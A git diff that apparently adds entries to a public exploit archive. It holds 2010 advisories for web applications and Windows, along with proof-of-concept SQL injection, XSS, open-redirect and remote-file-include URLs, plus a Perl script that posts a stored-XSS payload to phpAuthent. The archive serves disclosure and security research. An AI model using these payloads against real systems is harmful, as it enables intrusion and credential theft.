diff --git a/files.csv b/files.csv index 9100cd453..061d70016 100755 --- a/files.csv +++ b/files.csv @@ -30400,6 +30400,7 @@ id,file,description,date,author,platform,type,port 33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0 33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS Multiple SQL Injection Vulnerabilities",2010-03-11,MustLive,php,webapps,0 +33750,platforms/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution Vulnerability",2010-03-06,Secumania,windows,remote,0 33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 'BASEPATH' Multiple Remote File Include Vulnerabilities",2010-03-11,eidelweiss,php,webapps,0 33752,platforms/linux/remote/33752.html,"WebKit 1.2.x Right-to-Left Displayed Text Handling Memory Corruption Vulnerability",2010-03-11,wushi,linux,remote,0 33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host 'topic.php' SQL Injection Vulnerability",2010-03-12,Pr0T3cT10n,php,webapps,0 @@ -30418,6 +30419,7 @@ id,file,description,date,author,platform,type,port 33766,platforms/php/webapps/33766.txt,"Joomla! 'com_as' Component 'catid' Parameter SQL Injection Vulnerability",2010-03-16,N2n-Hacker,php,webapps,0 33767,platforms/novell/remote/33767.rb,"Novell eDirectory 8.8.5 DHost Weak Session Cookie Session Hijacking Vulnerability",2010-03-14,metasploit,novell,remote,0 33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 'langname' Parameter Local File Include Vulnerability",2010-03-17,7Safe,php,webapps,0 +33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption Vulnerability",2010-03-17,ITSecTeam,windows,dos,0 33771,platforms/php/webapps/33771.txt,"Joomla! 'com_alert' Component 'q_item' Parameter SQL Injection Vulnerability",2010-03-17,N2n-Hacker,php,webapps,0 33772,platforms/php/webapps/33772.txt,"phpBB2 Plus 1.53 'kb.php' SQL Injection Vulnerability",2010-03-17,Gamoscu,php,webapps,0 33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 'admin.html' Multiple SQL Injection Vulnerabilities",2010-03-18,blake,php,webapps,0 @@ -30426,3 +30428,13 @@ id,file,description,date,author,platform,type,port 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 'detail.php' Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-18,d3v1l,php,webapps,0 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 Multiple Cross Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 GET Request Format String Denial Of Service Vulnerability",2010-03-20,Rick2600,windows,dos,0 +33779,platforms/jsp/webapps/33779.txt,"agXchange ESM 'ucschcancelproc.jsp' Open Redirection Vulnerability",2010-03-22,Lament,jsp,webapps,0 +33780,platforms/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x 'names.nsf' Cross Site Scripting Vulnerability",2010-03-19,Lament,multiple,remote,0 +33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla <= 1.1.10 'definitions.php' Multiple Remote File Include Vulnerabilities",2010-03-23,eidelweiss,php,webapps,0 +33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x 'b-day.php' Addon SQL Injection Vulnerability",2010-03-22,n3w7u,php,webapps,0 +33783,platforms/linux/remote/33783.txt,"Astaro Security Linux 5 'index.fpl' Cross-Site Scripting Vulnerability",2010-03-23,"Vincent Hautot",linux,remote,0 +33784,platforms/php/webapps/33784.txt,"vBulletin 4.0.2 Search Cross Site Scripting Vulnerability",2010-03-19,5ubzer0,php,webapps,0 +33785,platforms/jsp/webapps/33785.txt,"agXchange ESM 'ucquerydetails.jsp' Cross Site Scripting Vulnerability",2010-03-23,Lament,jsp,webapps,0 +33786,platforms/multiple/remote/33786.txt,"Cafu 9.06 - Multiple Remote Vulnerabilities",2010-03-23,"Luigi Auriemma",multiple,remote,0 +33787,platforms/php/webapps/33787.txt,"RepairShop2 index.php Prod Parameter XSS",2010-03-23,kaMtiEz,php,webapps,0 +33788,platforms/php/webapps/33788.pl,"phpAuthent 0.2.1 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,php,webapps,0 diff --git a/platforms/jsp/webapps/33779.txt b/platforms/jsp/webapps/33779.txt new file mode 100755 index 000000000..b2925ba10 --- /dev/null +++ b/platforms/jsp/webapps/33779.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/38879/info + +agXchange ESM is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. + +A successful exploit may aid in phishing attacks; other attacks are possible. + +http://www.example.com/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com \ No newline at end of file diff --git a/platforms/jsp/webapps/33785.txt b/platforms/jsp/webapps/33785.txt new file mode 100755 index 000000000..c3306bf6d --- /dev/null +++ b/platforms/jsp/webapps/33785.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/38896/info + +agXchange ESM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/[agx_application]/pages/ucquerydetails.jsp?QueryID=>%22%27> \ No newline at end of file diff --git a/platforms/linux/remote/33783.txt b/platforms/linux/remote/33783.txt new file mode 100755 index 000000000..b314d36d5 --- /dev/null +++ b/platforms/linux/remote/33783.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/38893/info + +Astaro Security Linux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +The issue affects Astaro Security Linux 5; other versions may also be affected. + +The following example POST data is available: + +username=my@example.com&password=DTC&SID=>">&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0 + diff --git a/platforms/multiple/remote/33780.txt b/platforms/multiple/remote/33780.txt new file mode 100755 index 000000000..be8e42d89 --- /dev/null +++ b/platforms/multiple/remote/33780.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/38880/info + + +IBM Lotus Notes is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Lotus Notes 6.x is vulnerable; other versions may also be affected. + +http://www.example.com/names.nsf/ \ No newline at end of file diff --git a/platforms/multiple/remote/33786.txt b/platforms/multiple/remote/33786.txt new file mode 100755 index 000000000..699704eba --- /dev/null +++ b/platforms/multiple/remote/33786.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/38897/info + +Cafu is prone to a remote NULL pointer dereference vulnerability and a remote client format string vulnerability. + +Successful exploits may allow an attacker to execute arbitrary code within the context of the affected application or crash the affected application, resulting in a denial-of-service condition. + +Cafu 9.06 and prior are vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/33786.zip \ No newline at end of file diff --git a/platforms/php/webapps/33781.txt b/platforms/php/webapps/33781.txt new file mode 100755 index 000000000..e04a931a6 --- /dev/null +++ b/platforms/php/webapps/33781.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/38889/info + +Vanilla is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible. + +Vanilla 1.1.10 and prior versions are vulnerable. + +http://www.example.com/PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r] +http://www.example.com/PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r] \ No newline at end of file diff --git a/platforms/php/webapps/33782.txt b/platforms/php/webapps/33782.txt new file mode 100755 index 000000000..cef8adbea --- /dev/null +++ b/platforms/php/webapps/33782.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/38891/info + +PHPKIT 'b-day.php' addon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1-- \ No newline at end of file diff --git a/platforms/php/webapps/33784.txt b/platforms/php/webapps/33784.txt new file mode 100755 index 000000000..528eb0d6f --- /dev/null +++ b/platforms/php/webapps/33784.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/38895/info + +vBulletin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +vBulletin 4.0.2 is vulnerable. This issue does not affect vBulletin 3.x versions. + +The following example URIs are available: + +http://www.example.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="> + +http://www.example.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="> \ No newline at end of file diff --git a/platforms/php/webapps/33787.txt b/platforms/php/webapps/33787.txt new file mode 100755 index 000000000..1650917fe --- /dev/null +++ b/platforms/php/webapps/33787.txt @@ -0,0 +1,64 @@ +source: http://www.securityfocus.com/bid/38907/info + +RepairShop 2 is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +RepairShop 2 1.9.023 Trial is vulnerable; other versions may also be affected. + +############################################################################################################# +## RepairShop2 - cross site scripting ( XSS ) ## +## Author : kaMtiEz (kamzcrew@yahoo.com) ## +## Homepage : http://www.indonesiancoder.com ## +## Date : 20 March, 2010 ## +############################################################################################################# + +[ Software Information ] + +[+] Vendor : http://www.realitymedias.com/ +[+] Download : http://www.realitymedias.com/repairshop/?L=downloads +[+] version : 1.9.023 +[+] Vulnerability : XSS +[+] Dork : syalalala +[+] LOCATION : INDONESIA - JOGJA +############################################################################################################# + +[ Vulnerable File ] + +http://127.0.0.1/[kaMtiEz]/shop/?b=products.details&prod=[INDONESIANCODER] + +[ EXPLOIT ] + +"> + +[ DEMO ] + +http://n3x.realitymedias.com/rshop_demo/shop/?b=products.details&prod="> + +[ FIX ] + +:( + + +############################################################################################################# + +[ Thx TO ] + +[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah +[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot +[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck +[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31 + + +[ NOTE ] + +[+] Babe enyak adek i love u pull dah .. +[+] to someone .. satu langkah lagi .. :D +[+] CS-31 : kutunggu di kotaku :"> + +[ QUOTE ] + +[+] INDONESIANCODER still r0x +[+] nothing secure .. + + diff --git a/platforms/php/webapps/33788.pl b/platforms/php/webapps/33788.pl new file mode 100755 index 000000000..e16312c2c --- /dev/null +++ b/platforms/php/webapps/33788.pl @@ -0,0 +1,66 @@ +source: http://www.securityfocus.com/bid/38908/info + + +phpAuthent is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +phpAuthent 0.2.1 is vulnerable; other versions may also be affected. + +# Exploit Title: phpAuthentAdmin permanent XSS +# Date: 2010-03-21 +# Author: Yoyahack +# Software Link: http://sourceforge.net/projects/phpauth/files/phpAuthent/phpAuthent%200.2.1/phpAuthent-0.2.1-20050828-116.zip/download +# Version: 0.2.1 +# Tested on: linux + +#Exploit: + +#!/usr/bin/perl +#Autor: Yoyahack +#Web: http://undersecurity.net +#Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V.... + +use LWP::UserAgent; +use HTTP::Request::Common; + +#Source + +print q(--------------------------------- +Autor: Yoyahack +Web: http://undersecurity.net +Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V.... +--------------------------------- +); + +if(!$ARGV[0]){ +print "Insert web\n"; +print "Ex: www.webpage.com\n"; +exit; +} + +$xss = qq(); +my $ua = new LWP::UserAgent; +$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.2pre)". +"Gecko/20100308 Ubuntu/9.10 (karmic) Namoroka/3.6.2pre"); + +$response = $ua->request( + POST "http://$ARGV[0]/phpauthent/phpauthentadmin/useradd.php?action=create", + { + action => 'changerealname', + name => $xss, + action => 'rename', + login => 'aaa', + action=> 'password', + password => 'XSS', + action => 'changeemail', + email => 'XSS', + }, +'Cookie' => 'PHPSESSID=cf1c170aa9d334d6cec1514e721573e6', +); +$loc = 'index.php?msg=001'; +if($loc eq $response->header('location')){ +print "\n\nExploit send!\n"; +exit; +} +print "\n\nExploit Faield\n"; diff --git a/platforms/windows/dos/33770.txt b/platforms/windows/dos/33770.txt new file mode 100755 index 000000000..ffff7252b --- /dev/null +++ b/platforms/windows/dos/33770.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/38790/info + +Microsoft Windows Media Player is prone to a remote memory-corruption vulnerability when handling specially crafted AVI files. + +An attacker can exploit this issue by enticing an unsuspecting user to open a malicious file with the vulnerable application. A successful exploit may allow arbitrary code to run in the context of the currently logged-in user. + +Windows Media Player 11 is vulnerable; other versions may also be affected. + +UPDATE (Mar 19, 2010): The vendor has not been able to replicate this issue. Pending further investigation, this BID will be updated and possibly retired. + +http://www.exploit-db.com/sploits/33770.avi.gz \ No newline at end of file diff --git a/platforms/windows/remote/33750.txt b/platforms/windows/remote/33750.txt new file mode 100755 index 000000000..c9eeb596b --- /dev/null +++ b/platforms/windows/remote/33750.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/38661/info + +Microsoft Windows is prone to a remote command-execution vulnerability because it opens help files from unsafe locations. + +An attacker could exploit this issue by enticing a victim to load help files when working in a directory containing crafted '.chm' files. + +Windows 2000 and XP are vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/33750.zip \ No newline at end of file